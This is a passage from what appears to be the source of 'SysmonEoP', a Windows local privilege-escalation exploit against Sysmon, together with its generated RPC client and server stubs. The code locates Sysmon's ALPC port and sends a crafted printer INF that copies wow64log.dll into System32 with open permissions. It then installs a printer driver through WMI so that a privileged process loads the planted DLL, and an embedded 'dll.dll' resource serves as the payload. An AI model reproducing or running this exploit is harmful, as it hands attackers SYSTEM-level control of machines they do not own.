if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH | DDD_REMOVE_DEFINITION | DDD_EXACT_MATCH_ON_REMOVE, object, target)) {
printf("[+] Symlink %ls -> %ls deleted!\n", object, target);
return TRUE;
}
else
{
printf("error :%d\n", GetLastError());
return FALSE;
}
}
LPWSTR Find() {
HANDLE rpccontrolobj;
OBJECT_ATTRIBUTES obj;
const wchar_t rpccontrol[] = L"\\RPC Control";
UNICODE_STRING unicode_string = { 0 };
pRtlInitUnicodeString(&unicode_string, rpccontrol);
InitializeObjectAttributes(&obj, &unicode_string, 0, 0, 00);
NTSTATUS result = pNtOpenDirectoryObect(&rpccontrolobj, 0x0001 | 0x0002, &obj);
if (result == 0) {
BYTE* buffer = (BYTE*)malloc(100000);
ULONG start = 0, index = 0, bytes;
BOOLEAN restart = TRUE;
for (;;)
{
result = pNtQueryDirectoryObject(rpccontrolobj, (PBYTE)buffer, 100000, FALSE, restart, &index, &bytes);
if (result == 0)
{
POBJECT_DIRECTORY_INFORMATION objectlist = (POBJECT_DIRECTORY_INFORMATION)buffer;
for (ULONG i = 0; i < index - start; i++)
{
if (0 == wcsncmp(objectlist[i].TypeName.Buffer, L"ALPC Port", objectlist[i].TypeName.Length / sizeof(WCHAR)))
{
if (wcsstr(objectlist[i].Name.Buffer, L"syscliprpc")) {
return objectlist[i].Name.Buffer;
}
}
}
}
if (STATUS_MORE_ENTRIES == result)
{
start = index;
restart = FALSE;
continue;
}
else if (STATUS_NO_MORE_ENTRIES == 0 || (result == 0)) {
CloseHandle(rpccontrolobj);
break;
}
}
return NULL;
}
return NULL;
}
void Trigger(LPWSTR alpc)
{
RPC_STATUS status;
RPC_WSTR StringBinding;
RPC_BINDING_HANDLE Binding;
wchar_t data[] = L"; Windows Inbox Printer Drivers\n\n[Version]\nSignature=\"$Windows NT$\"\nProvider=\"Microsoft\"\nClassGUID={4D36E979-E325-11CE-BFC1-08002BE10318}\nClass=Printer\nCatalogFile=prnge001.cat\nDriverVer = 06/21/2006,10.0.19041.1\n\n\n[Manufacturer]\n\"Generic\"=Generic,NTamd64\n\n[Test.CopyFiles]\nwow64log.dll,TTY.DLL,,4\n\n[Test.CopyFiles.security]\n\"D:AI(A;;GA;;;SY)(A;;GA;;;AU)(A;;GA;;;BA)\"\n\n\n[Generic.NTamd64]\n\"Generic / Text Only\" = TTY.GPD,GenericGeneric_/_Tex8040,Generic_/_Text_Only\n\"Generic IBM Graphics 9pin\" = GENIBM9.GPD,GenericGeneric_IBM_GD35A,Generic_IBM_Graphics_9pin\n\"Generic IBM Graphics 9pin wide\" = GENIBM9W.GPD,GenericGeneric_IBM_GC7D5,Generic_IBM_Graphics_9pin_wide\n\"MS Publisher Color Printer\" = MSGENCOL.PPD,GenericMS_Publisher_25C7,MS_Publisher_Color_Printer\n\"MS Publisher Imagesetter\" = MSGENBW.PPD,GenericMS_Publisher_B397,MS_Publisher_Imagesetter\n\n\n[TTY.GPD]\nCopyFiles=@TTYRES.DLL,@TTY.INI,@TTY.DLL,@TTYUI.DLL,@TTY.GPD,@TTYUI.HLP\nCopyFiles=Test.CopyFiles\nDataFile=TTY.GPD\nCoreDriverSections=\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\"\n\n[GENIBM9.GPD]\nCopyFiles=@OK9IBRES.DLL,@GENIBM9.GPD\nDataFile=GENIBM9.GPD\nCoreDriverSections=\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\"\n\n[GENIBM9W.GPD]\nCopyFiles=@OK9IBRES.DLL,@GENIBM9W.GPD\nDataFile=GENIBM9W.GPD\nCoreDriverSections=\"{D20EA372-DD35-4950-9ED8-A6335AFE79F0},UNIDRV.OEM,UNIDRV_DATA\"\n\n[MSGENCOL.PPD]\nCopyFiles=@MSGENCOL.PPD\nDataFile=MSGENCOL.PPD\nCoreDriverSections=\"{D20EA372-DD35-4950-9ED8-A6335AFE79F1},PSCRIPT.OEM,PSCRIPT_DATA\"\n\n[MSGENBW.PPD]\nCopyFiles=@MSGENBW.PPD\nDataFile=MSGENBW.PPD\nCoreDriverSections=\"{D20EA372-DD35-4950-9ED8-A6335AFE79F1},PSCRIPT.OEM,PSCRIPT_DATA\"\n\n[DestinationDirs]\nDefaultDestDir=66000\nTest.CopyFiles=11\n\n[SourceDisksFiles]\nMSGENBW.PPD = 1\nTTY.DLL = 1\nTTYUI.HLP = 1\nGENIBM9W.GPD = 1\nTTY.INI = 1\nMSGENCOL.PPD = 1\nGENIBM9.GPD = 1\nOK9IBRES.DLL = 1\nTTYUI.DLL = 1\nTTYRES.DLL = 1\nTTY.GPD = 1\n\n[PrinterPackageInstallation.amd64]\nPackageAware=TRUE\nCoreDriverDependencies={D20EA372-DD35-4950-9ED8-A6335AFE79F0},{D20EA372-DD35-4950-9ED8-A6335AFE79F1}\nInboxVersionRequired=UseDriverVer\n\n[Strings]\n;Non-Localizable\n\n;Localizable\nDisk1=\"Windows Installation Disc\"\n\n[SourceDisksNames.x86]\n1 = %Disk1%,,,\"I386\"\n\n[SourceDisksNames.amd64]\n1 = %Disk1%,,,\"Amd64\"\n\n[SourceDisksNames.ia64]\n1 = %Disk1%,,,\"Ia64\"\n\n[SourceDisksNames.arm]\n1 = %Disk1%,,,\"arm\"\n\n[SourceDisksNames.arm64]\n1 = %Disk1%,,,\"arm64\"\n";
status = RpcStringBindingCompose(NULL, (RPC_WSTR)L"ncalrpc", NULL, (RPC_WSTR)alpc, NULL, &StringBinding);
status = RpcBindingFromStringBinding(StringBinding, &Binding);
status = RpcStringFree(&StringBinding);
RpcTryExcept
{
Proc1(Binding, 3036,data);
}
RpcExcept(EXCEPTION_EXECUTE_HANDLER);
{
printf("Error: %d\n",RpcExceptionCode());
}
RpcEndExcept
status = RpcBindingFree(&Binding);
}
LPWSTR BuildPath(LPCWSTR path) {
wchar_t ntpath[MAX_PATH];
swprintf(ntpath, L"\\??\\%s", path);
return ntpath;
}
BOOL AddPrinterDriverWmi() {
HRESULT hr;
hr = CoInitializeEx(0, COINIT_MULTITHREADED);
if (FAILED(hr))
{
CoUninitialize();
return FALSE;
}
hr = CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, NULL);
if (FAILED(hr))
{
CoUninitialize();
return FALSE;
}
IWbemLocator* pLoc = NULL;
hr = CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (LPVOID*)&pLoc);
if (FAILED(hr))
{
CoUninitialize();
return FALSE;
}
IWbemServices* pSvc = NULL;
hr = pLoc->ConnectServer(_bstr_t(L"ROOT\\StandardCimv2"), NULL, NULL, 0, NULL, 0, 0, &pSvc);
if (FAILED(hr)) {
pLoc->Release();
CoUninitialize();
return FALSE;
}
hr = CoSetProxyBlanket(pSvc, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL, RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE);
if (FAILED(hr)) {
pSvc->Release();
pLoc->Release();
CoUninitialize();
}
BSTR MethodName = SysAllocString(L"Add");
BSTR ClassName = SysAllocString(L"MSFT_PrinterDriver");
IWbemClassObject* pClass = NULL;
hr = pSvc->GetObject(ClassName, 0, NULL, &pClass, NULL);
IWbemClassObject* pInParamsDefinition = NULL;
hr = pClass->GetMethod(MethodName, 0, &pInParamsDefinition, NULL);
IWbemClassObject* pClassInstance = NULL;
hr = pInParamsDefinition->SpawnInstance(0, &pClassInstance);
VARIANT varCommand,varCommand2;
varCommand.vt = VT_BSTR;
varCommand.bstrVal = _bstr_t(L"Generic / Text Only");
varCommand2.vt = VT_BSTR;
varCommand2.bstrVal = _bstr_t(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnge001.inf_amd64_1daeee8f3aa30fcb\\prnge001.inf");
hr = pClassInstance->Put(L"Name", 0, &varCommand, 0);
hr = pClassInstance->Put(L"InfPath", 0, &varCommand2, 0);
IWbemClassObject* pOutParams = NULL;
hr = pSvc->ExecMethod(ClassName, MethodName, 0, NULL, pClassInstance, &pOutParams, NULL);
if (FAILED(hr))
{
VariantClear(&varCommand);
SysFreeString(ClassName);
SysFreeString(MethodName);
pClass->Release();
pClassInstance->Release();
pInParamsDefinition->Release();
pOutParams->Release();
pSvc->Release();
pLoc->Release();
CoUninitialize();
return FALSE;
}
return TRUE;
}
void __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)
{
return((void __RPC_FAR*) malloc(cBytes));
}
void __RPC_USER midl_user_free(void __RPC_FAR* p)
{
free(p);
}
================================================
FILE: v2/SysmonEoP/resource.h
================================================
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by FolderOrFileDeleteToSystem.rc
//
#define IDR_DLL1 101
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 107
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
================================================
FILE: v2/SysmonEoP/resource.rc
================================================
// Microsoft Visual C++ generated resource script.
//
#include "resource.h"
#define APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 2 resource.
//
#include "winres.h"
/////////////////////////////////////////////////////////////////////////////
#undef APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
// English (United Kingdom) resources
#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENG)
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_UK
#pragma code_page(1252)
#ifdef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// TEXTINCLUDE
//
1 TEXTINCLUDE
BEGIN
"resource.h\0"
END
2 TEXTINCLUDE
BEGIN
"#include ""winres.h""\r\n"
"\0"
END
3 TEXTINCLUDE
BEGIN
"\r\n"
"\0"
END
#endif // APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// RBS
//
IDR_DLL1 DLL "dll.dll"
#endif // English (United Kingdom) resources
/////////////////////////////////////////////////////////////////////////////
#ifndef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 3 resource.
//
/////////////////////////////////////////////////////////////////////////////
#endif // not APSTUDIO_INVOKED
================================================
FILE: v2/SysmonEoP/sysmon.idl
================================================
[
uuid(1e72d56f-eec6-44d3-bbed-5caa50790812),
version(1.0),
]
interface DefaultIfName
{
long Proc0(
);
void Proc1(
[in]long arg_0,
[in][string] wchar_t* arg_1);
}
================================================
FILE: v2/SysmonEoP/sysmon_c.c
================================================
/* this ALWAYS GENERATED file contains the RPC client stubs */
/* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
*/
/* Compiler settings for sysmon.idl:
Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
protocol : all , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
#if defined(_M_AMD64)
#if _MSC_VER >= 1200
#pragma warning(push)
#endif
#pragma warning( disable: 4211 ) /* redefine extern to static */
#pragma warning( disable: 4232 ) /* dllimport identity*/
#pragma warning( disable: 4024 ) /* array to pointer mapping*/
#include <string.h>
#include "sysmon_h.h"
#define TYPE_FORMAT_STRING_SIZE 7
#define PROC_FORMAT_STRING_SIZE 79
#define EXPR_FORMAT_STRING_SIZE 1
#define TRANSMIT_AS_TABLE_SIZE 0
#define WIRE_MARSHAL_TABLE_SIZE 0
typedef struct _sysmon_MIDL_TYPE_FORMAT_STRING
{
short Pad;
unsigned char Format[ TYPE_FORMAT_STRING_SIZE ];
} sysmon_MIDL_TYPE_FORMAT_STRING;
typedef struct _sysmon_MIDL_PROC_FORMAT_STRING
{
short Pad;
unsigned char Format[ PROC_FORMAT_STRING_SIZE ];
} sysmon_MIDL_PROC_FORMAT_STRING;
typedef struct _sysmon_MIDL_EXPR_FORMAT_STRING
{
long Pad;
unsigned char Format[ EXPR_FORMAT_STRING_SIZE ];
} sysmon_MIDL_EXPR_FORMAT_STRING;
static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax =
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};
static const RPC_SYNTAX_IDENTIFIER _NDR64_RpcTransferSyntax =
{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}};
extern const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString;
extern const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString;
extern const sysmon_MIDL_EXPR_FORMAT_STRING sysmon__MIDL_ExprFormatString;
#define GENERIC_BINDING_TABLE_SIZE 0
/* Standard interface: DefaultIfName, ver. 1.0,
GUID={0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}} */
extern const MIDL_STUBLESS_PROXY_INFO DefaultIfName_ProxyInfo;
static const RPC_CLIENT_INTERFACE DefaultIfName___RpcClientInterface =
{
sizeof(RPC_CLIENT_INTERFACE),
{{0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}},{1,0}},
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
0,
0,
0,
0,
&DefaultIfName_ProxyInfo,
0x02000000
};
RPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcClientInterface;
extern const MIDL_STUB_DESC DefaultIfName_StubDesc;
static RPC_BINDING_HANDLE DefaultIfName__MIDL_AutoBindHandle;
long Proc0(
/* [in] */ handle_t IDL_handle)
{
CLIENT_CALL_RETURN _RetVal;
_RetVal = NdrClientCall3(
( PMIDL_STUBLESS_PROXY_INFO )&DefaultIfName_ProxyInfo,
0,
0,
IDL_handle);
return ( long )_RetVal.Simple;
}
void Proc1(
/* [in] */ handle_t IDL_handle,
/* [in] */ long arg_0,
/* [string][in] */ wchar_t *arg_1)
{
NdrClientCall3(
( PMIDL_STUBLESS_PROXY_INFO )&DefaultIfName_ProxyInfo,
1,
0,
IDL_handle,
arg_0,
arg_1);
}
#if !defined(__RPC_WIN64__)
#error Invalid build platform for this stub.
#endif
static const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString =
{
0,
{
/* Procedure Proc0 */
0x0, /* 0 */
0x48, /* Old Flags: */
/* 2 */ NdrFcLong( 0x0 ), /* 0 */
/* 6 */ NdrFcShort( 0x0 ), /* 0 */
/* 8 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */
/* 10 */ 0x32, /* FC_BIND_PRIMITIVE */
0x0, /* 0 */
/* 12 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */
/* 14 */ NdrFcShort( 0x0 ), /* 0 */
/* 16 */ NdrFcShort( 0x8 ), /* 8 */
/* 18 */ 0x44, /* Oi2 Flags: has return, has ext, */
0x1, /* 1 */
/* 20 */ 0xa, /* 10 */
0x1, /* Ext Flags: new corr desc, */
/* 22 */ NdrFcShort( 0x0 ), /* 0 */
/* 24 */ NdrFcShort( 0x0 ), /* 0 */
/* 26 */ NdrFcShort( 0x0 ), /* 0 */
/* 28 */ NdrFcShort( 0x0 ), /* 0 */
/* Return value */
/* 30 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */
/* 32 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */
/* 34 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Procedure Proc1 */
/* 36 */ 0x0, /* 0 */
0x48, /* Old Flags: */
/* 38 */ NdrFcLong( 0x0 ), /* 0 */
/* 42 */ NdrFcShort( 0x1 ), /* 1 */
/* 44 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */
/* 46 */ 0x32, /* FC_BIND_PRIMITIVE */
0x0, /* 0 */
/* 48 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */
/* 50 */ NdrFcShort( 0x8 ), /* 8 */
/* 52 */ NdrFcShort( 0x0 ), /* 0 */
/* 54 */ 0x42, /* Oi2 Flags: clt must size, has ext, */
0x2, /* 2 */
/* 56 */ 0xa, /* 10 */
0x1, /* Ext Flags: new corr desc, */
/* 58 */ NdrFcShort( 0x0 ), /* 0 */
/* 60 */ NdrFcShort( 0x0 ), /* 0 */
/* 62 */ NdrFcShort( 0x0 ), /* 0 */
/* 64 */ NdrFcShort( 0x0 ), /* 0 */
/* Parameter arg_0 */
/* 66 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 68 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */
/* 70 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter arg_1 */
/* 72 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */
/* 74 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */
/* 76 */ NdrFcShort( 0x4 ), /* Type Offset=4 */
0x0
}
};
static const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString =
{
0,
{
NdrFcShort( 0x0 ), /* 0 */
/* 2 */
0x11, 0x8, /* FC_RP [simple_pointer] */
/* 4 */
0x25, /* FC_C_WSTRING */
0x5c, /* FC_PAD */
0x0
}
};
static const unsigned short DefaultIfName_FormatStringOffsetTable[] =
{
0,
36
};
#endif /* defined(_M_AMD64)*/
/* this ALWAYS GENERATED file contains the RPC client stubs */
/* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
*/
/* Compiler settings for sysmon.idl:
Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
protocol : all , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
#if defined(_M_AMD64)
#if !defined(__RPC_WIN64__)
#error Invalid build platform for this stub.
#endif
#include "ndr64types.h"
#include "pshpack8.h"
typedef
struct _NDR64_CONFORMANT_STRING_FORMAT
__midl_frag7_t;
extern const __midl_frag7_t __midl_frag7;
typedef
struct _NDR64_POINTER_FORMAT
__midl_frag6_t;
extern const __midl_frag6_t __midl_frag6;
typedef
NDR64_FORMAT_CHAR
__midl_frag5_t;
extern const __midl_frag5_t __midl_frag5;
typedef
struct
{
struct _NDR64_PROC_FORMAT frag1;
struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;
struct _NDR64_PARAM_FORMAT frag3;
struct _NDR64_PARAM_FORMAT frag4;
}
__midl_frag4_t;
extern const __midl_frag4_t __midl_frag4;
typedef
struct
{
struct _NDR64_PROC_FORMAT frag1;
struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;
struct _NDR64_PARAM_FORMAT frag3;
}
__midl_frag2_t;
extern const __midl_frag2_t __midl_frag2;
typedef
NDR64_FORMAT_UINT32
__midl_frag1_t;
extern const __midl_frag1_t __midl_frag1;
static const __midl_frag7_t __midl_frag7 =
{
/* *wchar_t */
{
/* *wchar_t */
0x64, /* FC64_CONF_WCHAR_STRING */
{
/* *wchar_t */
0,
0,
0,
0,
0,
0,
0,
0
},
(NDR64_UINT16) 2 /* 0x2 */
}
};
static const __midl_frag6_t __midl_frag6 =
{
/* *wchar_t */
0x20, /* FC64_RP */
(NDR64_UINT8) 0 /* 0x0 */,
(NDR64_UINT16) 0 /* 0x0 */,
&__midl_frag7
};
static const __midl_frag5_t __midl_frag5 =
0x5 /* FC64_INT32 */;
static const __midl_frag4_t __midl_frag4 =
{
/* Proc1 */
{
/* Proc1 */ /* procedure Proc1 */
(NDR64_UINT32) 17039424 /* 0x1040040 */, /* explicit handle */ /* IsIntrepreted, ClientMustSize, HasExtensions */
(NDR64_UINT32) 24 /* 0x18 */ , /* Stack size */
(NDR64_UINT32) 8 /* 0x8 */,
(NDR64_UINT32) 0 /* 0x0 */,
(NDR64_UINT16) 0 /* 0x0 */,
(NDR64_UINT16) 0 /* 0x0 */,
(NDR64_UINT16) 2 /* 0x2 */,
(NDR64_UINT16) 8 /* 0x8 */
},
{
/* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
{
/* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
0x72, /* FC64_BIND_PRIMITIVE */
(NDR64_UINT8) 0 /* 0x0 */,
0 /* 0x0 */, /* Stack offset */
(NDR64_UINT8) 0 /* 0x0 */,
(NDR64_UINT8) 0 /* 0x0 */
},
(NDR64_UINT16) 0 /* 0x0 */ /* Notify index */
},
{
/* arg_0 */ /* parameter arg_0 */
&__midl_frag5,
{
/* arg_0 */
0,
0,
0,
1,
0,
0,
1,
1,
0,
0,
0,
0,
0,
(NDR64_UINT16) 0 /* 0x0 */,
0
}, /* [in], Basetype, ByValue */
(NDR64_UINT16) 0 /* 0x0 */,
8 /* 0x8 */, /* Stack offset */
},
{
/* arg_1 */ /* parameter arg_1 */
&__midl_frag7,
{
/* arg_1 */
1,
1,
0,
1,
0,
0,
0,
0,
1,
0,
0,
0,
0,
(NDR64_UINT16) 0 /* 0x0 */,
0
}, /* MustSize, MustFree, [in], SimpleRef */
(NDR64_UINT16) 0 /* 0x0 */,
16 /* 0x10 */, /* Stack offset */
}
};
static const __midl_frag2_t __midl_frag2 =
{
/* Proc0 */
{
/* Proc0 */ /* procedure Proc0 */
(NDR64_UINT32) 17301568 /* 0x1080040 */, /* explicit handle */ /* IsIntrepreted, HasReturn, HasExtensions */
(NDR64_UINT32) 16 /* 0x10 */ , /* Stack size */
(NDR64_UINT32) 0 /* 0x0 */,
(NDR64_UINT32) 8 /* 0x8 */,
(NDR64_UINT16) 0 /* 0x0 */,
(NDR64_UINT16) 0 /* 0x0 */,
(NDR64_UINT16) 1 /* 0x1 */,
(NDR64_UINT16) 8 /* 0x8 */
},
{
/* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
{
/* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
0x72, /* FC64_BIND_PRIMITIVE */
(NDR64_UINT8) 0 /* 0x0 */,
0 /* 0x0 */, /* Stack offset */
(NDR64_UINT8) 0 /* 0x0 */,
(NDR64_UINT8) 0 /* 0x0 */
},
(NDR64_UINT16) 0 /* 0x0 */ /* Notify index */
},
{
/* long */ /* parameter long */
&__midl_frag5,
{
/* long */
0,
0,
0,
0,
1,
1,
1,
1,
0,
0,
0,
0,
0,
(NDR64_UINT16) 0 /* 0x0 */,
0
}, /* [out], IsReturn, Basetype, ByValue */
(NDR64_UINT16) 0 /* 0x0 */,
8 /* 0x8 */, /* Stack offset */
}
};
static const __midl_frag1_t __midl_frag1 =
(NDR64_UINT32) 0 /* 0x0 */;
#include "poppack.h"
static const FormatInfoRef DefaultIfName_Ndr64ProcTable[] =
{
&__midl_frag2,
&__midl_frag4
};
static const MIDL_STUB_DESC DefaultIfName_StubDesc =
{
(void *)& DefaultIfName___RpcClientInterface,
MIDL_user_allocate,
MIDL_user_free,
&DefaultIfName__MIDL_AutoBindHandle,
0,
0,
0,
0,
sysmon__MIDL_TypeFormatString.Format,
1, /* -error bounds_check flag */
0x60001, /* Ndr library version */
0,
0x801026e, /* MIDL Version 8.1.622 */
0,
0,
0, /* notify & notify_flag routine table */
0x2000001, /* MIDL flag */
0, /* cs routines */
(void *)& DefaultIfName_ProxyInfo, /* proxy/server info */
0
};
static const MIDL_SYNTAX_INFO DefaultIfName_SyntaxInfo [ 2 ] =
{
{
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
0,
sysmon__MIDL_ProcFormatString.Format,
DefaultIfName_FormatStringOffsetTable,
sysmon__MIDL_TypeFormatString.Format,
0,
0,
0
}
,{
{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}},
0,
0 ,
(unsigned short *) DefaultIfName_Ndr64ProcTable,
0,
0,
0,
0
}
};
static const MIDL_STUBLESS_PROXY_INFO DefaultIfName_ProxyInfo =
{
&DefaultIfName_StubDesc,
sysmon__MIDL_ProcFormatString.Format,
DefaultIfName_FormatStringOffsetTable,
(RPC_SYNTAX_IDENTIFIER*)&_RpcTransferSyntax,
2,
(MIDL_SYNTAX_INFO*)DefaultIfName_SyntaxInfo
};
#if _MSC_VER >= 1200
#pragma warning(pop)
#endif
#endif /* defined(_M_AMD64)*/
================================================
FILE: v2/SysmonEoP/sysmon_h.h
================================================
/* this ALWAYS GENERATED file contains the definitions for the interfaces */
/* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
*/
/* Compiler settings for sysmon.idl:
Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
protocol : all , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
/* verify that the <rpcndr.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 500
#endif
#include "rpc.h"
#include "rpcndr.h"
#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif /* __RPCNDR_H_VERSION__ */
#ifndef __sysmon_h_h__
#define __sysmon_h_h__
#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif
/* Forward Declarations */
#ifdef __cplusplus
extern "C"{
#endif
#ifndef __DefaultIfName_INTERFACE_DEFINED__
#define __DefaultIfName_INTERFACE_DEFINED__
/* interface DefaultIfName */
/* [version][uuid] */
long Proc0(
/* [in] */ handle_t IDL_handle);
void Proc1(
/* [in] */ handle_t IDL_handle,
/* [in] */ long arg_0,
/* [string][in] */ wchar_t *arg_1);
extern RPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec;
extern RPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec;
#endif /* __DefaultIfName_INTERFACE_DEFINED__ */
/* Additional Prototypes for ALL interfaces */
/* end of Additional Prototypes */
#ifdef __cplusplus
}
#endif
#endif
================================================
FILE: v2/SysmonEoP/sysmon_s.c
================================================
/* this ALWAYS GENERATED file contains the RPC server stubs */
/* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038
*/
/* Compiler settings for sysmon.idl:
Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
protocol : all , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
#if defined(_M_AMD64)
#if _MSC_VER >= 1200
#pragma warning(push)
#endif
#pragma warning( disable: 4211 ) /* redefine extern to static */
#pragma warning( disable: 4232 ) /* dllimport identity*/
#pragma warning( disable: 4024 ) /* array to pointer mapping*/
#include <string.h>
#include "sysmon_h.h"
#define TYPE_FORMAT_STRING_SIZE 7
#define PROC_FORMAT_STRING_SIZE 79
#define EXPR_FORMAT_STRING_SIZE 1
#define TRANSMIT_AS_TABLE_SIZE 0
#define WIRE_MARSHAL_TABLE_SIZE 0
typedef struct _sysmon_MIDL_TYPE_FORMAT_STRING
{
short Pad;
unsigned char Format[ TYPE_FORMAT_STRING_SIZE ];
} sysmon_MIDL_TYPE_FORMAT_STRING;
typedef struct _sysmon_MIDL_PROC_FORMAT_STRING
{
short Pad;
unsigned char Format[ PROC_FORMAT_STRING_SIZE ];
} sysmon_MIDL_PROC_FORMAT_STRING;
typedef struct _sysmon_MIDL_EXPR_FORMAT_STRING
{
long Pad;
unsigned char Format[ EXPR_FORMAT_STRING_SIZE ];
} sysmon_MIDL_EXPR_FORMAT_STRING;
static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax =
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};
static const RPC_SYNTAX_IDENTIFIER _NDR64_RpcTransferSyntax =
{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}};
extern const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString;
extern const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString;
extern const sysmon_MIDL_EXPR_FORMAT_STRING sysmon__MIDL_ExprFormatString;
/* Standard interface: DefaultIfName, ver. 1.0,
GUID={0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}} */
extern const MIDL_SERVER_INFO DefaultIfName_ServerInfo;
extern const RPC_DISPATCH_TABLE DefaultIfName_v1_0_DispatchTable;
